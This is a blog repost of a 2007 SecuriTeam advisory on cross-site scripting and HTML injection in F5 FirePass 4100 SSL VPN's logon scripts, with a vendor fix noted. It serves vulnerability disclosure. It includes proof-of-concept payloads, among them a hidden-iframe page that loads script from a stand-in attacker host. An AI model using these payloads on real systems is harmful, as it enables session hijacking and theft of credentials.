Search This Blog

Sunday, December 02, 2007

[NEWS] F5 FirePass 4100 SSL VPN Cross-Site Scripting (XSS) and HTML Injection

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html


- - - - - - - - -

F5 FirePass 4100 SSL VPN Cross-Site Scripting (XSS) and HTML Injection
------------------------------------------------------------------------


SUMMARY

<http://www.f5.com/products/firepass/> F5 Network FirePass, "is a SSL VPN
solution by F5 Networks". F5 Networks FirePass 4100 SSL VPN is vulnerable
to XSS within the "my.logon.php3" and "my.activation.php3" server-side
scripts.

DETAILS

Vulnerable Systems:
* F5 FirePass 4100
o FirePass versions 5.4.1 - 5.5.2
o FirePass versions 6.0 - 6.0.1

An attacker may be able to cause execution of malicious scripting code in
the browser of a user who visits a specially-crafted URL to an F5 Firepass
device, or visits a malicious page that makes a request to such URL. Such
code would run within the security context of the target domain.

This type of attack can result in non-persistent defacement of the target
site, or the redirection of confidential information (i.e. admin session
IDs) to unauthorised third parties.

Proof of concept (PoC) URL:
https://target.tld/my.logon.php3?"></script><textarea>HTML_injection_test</textarea><!--
The payload in the example is
"></script><textarea>HTML_injection_test</textarea><!--

which injects a 'textarea' box

The following PoC HTML page would run JavaScript without any restrictions
from a third-party file ('http://www.evil.foo/b' in this case):

<html>
<iframe
src="https://target.tld/my.logon.php3?%22%3E%3C/script%3E%3Cscript%3Eeval%28name%29%3C/script%3E%3C%21--" width="0%" height="0%" name="xss=document.body.appendChild(document.createElement('script'));xss.setAttribute('src','http://www.evil.foo/b')"></iframe>
</html>

Solution:
F5 Networks has issued SOL7923:
<https://support.f5.com/kb/en-us/solutions/public/7000/900/SOL7923.html?sr=1> https://support.f5.com/kb/en-us/solutions/public/7000/900/SOL7923.html?sr=1


ADDITIONAL INFORMATION

The information has been provided by <mailto:research@procheckup.com>
ProCheckUp Research.
The original article can be found at:
<http://www.procheckup.com/Vulnerability_2007.php>

http://www.procheckup.com/Vulnerability_2007.php

========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)